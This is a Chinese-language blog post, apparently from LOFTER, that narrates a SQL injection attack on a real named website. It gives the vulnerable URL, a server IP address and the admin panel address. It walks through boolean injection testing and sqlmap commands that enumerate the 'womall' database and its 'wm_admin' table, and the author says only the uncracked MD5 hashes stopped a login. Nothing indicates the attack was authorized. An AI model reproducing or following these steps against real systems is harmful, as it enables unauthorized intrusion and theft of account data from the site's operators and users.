LOFTER for ipad —— 让兴趣,更有趣

点击下载 关闭

天梦博客

tianmenghk.lofter.com|个人应用 for Android

共7篇文章,20人喜欢

应用截图

天梦博客

天梦博客

 

· 检测169在线兑换

0x00  站点:http://t.169ol.com/

                注入点:http://119.6.119.51/index.php?act=exchange&op=exchange&vg_id=88

 


   看url  有注入  就判断 and 1=1返回正常

                                       and 1=2 返回错误

   存在注入   丢去sqlmap

0x01   

  先用sqlmap 看下注入点 

    sqlmap.py -u "url" 


0x02

    注入找表 

   sqlmap.py -u "url" --tables

   注入后找到了一个wm_admin的表  我们即将猜解他。

  


0x04

    猜字段

sqlmap.py -u "url" --columns -T "wm_admin" -D "womall"

 


0x05

   猜内容 



由于md5解不开 我也没法进去了= =  

后台:http://t.169ol.com/admin


天梦博客

功能说明

1. 独立查看“天梦博客”发布在LOFTER的所有文章
2. 文章更新通知提醒
3. 归档方式查看
4. 方便的分享文章到微信、微博

创建一个属于自己的APP

本应用由UAPP生成,内容版权归作者所有。UAPP支持LOFTER、网易博客、新浪博客、百度空间、QQ空间、blogbus、豆瓣日记、点点网、搜狐博客、网易摄影等生成个人应用。

了解更多